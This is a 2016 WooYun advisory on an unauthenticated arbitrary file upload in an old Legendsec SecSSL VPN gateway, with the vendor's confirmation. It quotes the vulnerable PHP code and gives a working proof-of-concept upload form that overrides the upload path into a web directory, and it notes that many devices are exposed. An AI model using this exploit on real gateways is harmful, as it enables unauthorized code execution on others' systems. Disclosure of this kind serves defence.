当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2016-170017

漏洞标题: 网神某网关设备2个任意代码执行漏洞(无需登录)

相关厂商: 网神信息技术(北京)股份有限公司

漏洞作者: 路人甲

提交时间: 2016-01-15 10:19

公开时间: 2016-04-11 16:08

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 文件上传安全

3人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-14: 细节向核心白帽子及相关领域专家公开
2016-03-24: 细节向普通白帽子公开
2016-04-03: 细节向实习白帽子公开
2016-04-11: 细节向公众公开

简要描述:

网神旧版SecSSL VPN产品

详细说明:

存在漏洞的文件

code 区域
/admin/account/user_add_action.php


/admin/account/user_edit_action.php


/admin/account/huge_user_edit_step1_action.php


/admin/account/admin_add_action.php


重复一处



这三个文件的部分漏洞代码为:

0x1 /admin/account/user_add_action.php(/admin/account/admin_add_action.php类似)

code 区域
if (($authServerUserFlag == 4) || ($authServerUserFlag == 5) || ($auth_type == 4)) {


	if ($_FILES['certificate_file']['error'] == UPLOAD_ERR_OK) {


		if(isset($_POST["zip_cb"]))


			$userId = 1;


		$file_size = $_FILES['certificate_file']['size'];


		$file_type = $_FILES['certificate_file']['type'];


		


		$temp_name = $_FILES['certificate_file']['tmp_name'];


		$gw_file_name = $_FILES['certificate_file']['name'];


		$gw_file_name = str_replace("\\","",$gw_file_name);


		$gw_file_name = str_replace("'","",$gw_file_name);


		$gw_file_name = str_replace(" ","",$gw_file_name);





		$file_path = $CFG_UPLOAD_PATH.$gw_file_name;





		//File Name Check


		if ( $gw_file_name == "" ) { 


			include "include/error.php";


			return;


		}



0x2 /admin/account/huge_user_edit_step1_action.php

code 区域
if (($auth_type == 4) || ($auth_type == 5)) {


	if ($_FILES['certificate_file']) {


		$file_size = $_FILES['certificate_file']['size'];


		$file_type = $_FILES['certificate_file']['type'];


		


		$temp_name = $_FILES['certificate_file']['tmp_name'];


		$gw_file_name = $_FILES['certificate_file']['name'];


		$gw_file_name = str_replace("\\","",$gw_file_name);


		$gw_file_name = str_replace("'","",$gw_file_name);


		$gw_file_name = str_replace(" ","",$gw_file_name);





		$file_path = $CFG_UPLOAD_PATH.$gw_file_name;


		$gw_file_name = $file_path;


		$result=  move_uploaded_file($temp_name, $file_path);


		chmod($file_path, $CFG_UPLOAD_MOD);


	}


}



根据上面的代码可以看出,对于文件的上传没有任何的限制,因此可直接上传任意文件

漏洞证明:

同样,保存如下代码为wooyun.htm

code 区域
<form action="**.**.**.**/admin/account/user_add_action.php?CFG_UPLOAD_PATH=/ssl/www/admin/js/" method="post" enctype ="multipart/form-data"> 


	<input name="certificate_file" type="file" />


	<input name="auth_type" type="hidden" value="4"/>


	<input type="submit" name="submit_post" value="pki_localca_import_addsave"/>


</form>



用浏览器打开该文件,修改host,直接上传即可:



漏洞大量存在,几乎是百发百中,给几个案例:

code 区域
**.**.**.**/welcome_pop.php


https://**.**.**.**/welcome_pop.php

修复方案:

严格限制文件上传

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-19 22:39

厂商回复:

感谢白帽子的反馈,经过核实,网神早年旧版VPN的确存在PHP漏洞缺陷问题,网神新一代SSLVPN产品不受影响。由于现存的旧版VPN客户数量不多,网神内部会针对现存的旧版VPN客户逐一进行联系,提供系统升级或设备更换服务。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录